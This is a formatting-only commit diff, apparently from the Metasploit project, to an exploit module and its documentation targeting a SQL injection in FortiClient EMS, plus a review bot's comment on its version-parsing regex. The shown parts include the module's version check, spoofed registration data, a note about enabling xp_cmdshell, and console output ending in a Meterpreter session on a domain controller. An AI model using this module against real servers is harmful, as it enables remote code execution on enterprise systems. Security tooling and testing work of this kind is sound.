
Commit c05aebe

committed
Formatting
1 parent e9cbb92 commit c05aebe


2 files changed

+9
-11
lines changed


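--- a/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
+++ b/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
@@ -167,7 +167,7 @@ Meterpreter : x64/windows
 meterpreter >
 ```
 
-# FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
+### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
 ```
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
 rhosts => 172.16.199.200
@@ -266,4 +266,4 @@ Domain : KERBEROS
 Logged On Users : 9
 Meterpreter : x64/windows
 meterpreter >
-```
+```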

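--- a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
+++ b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -72,7 +72,7 @@ def initialize(info = {})
 
 def get_register_info
 if @version >= Rex::Version.new('7.2')
-vprint_status("Returning SYSINFO for 7.2 target")
+vprint_status('Returning SYSINFO for 7.2 target')
 register_info = <<~REGISTER_INFO
 FCTOS=WIN64
 OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
@@ -123,7 +123,7 @@ def get_register_info
 EP_APPCTRLCHKSUM=0
 REGISTER_INFO
 else
-vprint_status("Returning SYSINFO for 7.0 target")
+vprint_status('Returning SYSINFO for 7.0 target')
 register_info = <<~REGISTER_INFO
 AVSIG_VER=1.00000
 REG_KEY=_
@@ -176,7 +176,7 @@ def get_register_info
 Rex::Text.encode_base64(register_info)
 end
 
-def get_version
+def get_version
 message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
 message << "SIZE= {SIZE_PLACEHOLDER}\n"
 message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
@@ -193,9 +193,9 @@ def get_version
 # 7.0.7:
 # FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
 if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
-major = ($1.to_i / 10)
-minor = $2.to_i
-patch = $3.to_i
+major = (::Regexp.last_match(1).to_i / 10)
+minor = ::Regexp.last_match(2).to_i
+patch = ::Regexp.last_match(3).to_i
 return Rex::Version.new("#{major}.#{minor}.#{patch}")
 end
 nil
@@ -222,7 +222,6 @@ def get_message(sqli)
 end
 
 def send_message(message)
-
 vprint_status("Sending the following message:\n #{message}")
 
 buf = ''
@@ -240,21 +239,20 @@ def send_message(message)
 end
 
 def check
-
 @version = get_version
 return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version
 
 if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
 return CheckCode::Appears("Version detected: #{@version}")
 end
+
 CheckCode::Safe("Version detected: #{@version}")
 end
 
 def fully_url_encode(string)
 string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
 end
 
-
 def exploit
 # Things to note:
 # 1. xp_cmdshell is disabled by default so we must enable it.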
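Review bot: In the get_version hunk (@@ -193,9 +193,9) the move to `::Regexp.last_match(n)` keeps an undocumented parsing trick: the first capture `(\d{2})` takes the major digit plus one digit of the following field, and `/ 10` silently discards that digit. Judging only from the `7000007` sample in the comment above it, the layout looks like major, three-digit minor, three-digit patch, so a nonzero digit in the discarded position would make `check` report its verdict against the wrong version. Named captures would state the intent, e.g. `if (m = buf.match(/EMSVER\|(?<major>\d+)(?<minor>\d{3})(?<patch>\d{3})\|/))` with `m[:major].to_i`, `m[:minor].to_i` and `m[:patch].to_i`; at minimum add a comment such as `# EMSVER is <major><minor:3><patch:3>; the extra digit in capture 1 is dropped by / 10`. get_version starts and ends outside this hunk, so the field layout should be confirmed against the full method and a real banner before changing the pattern.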
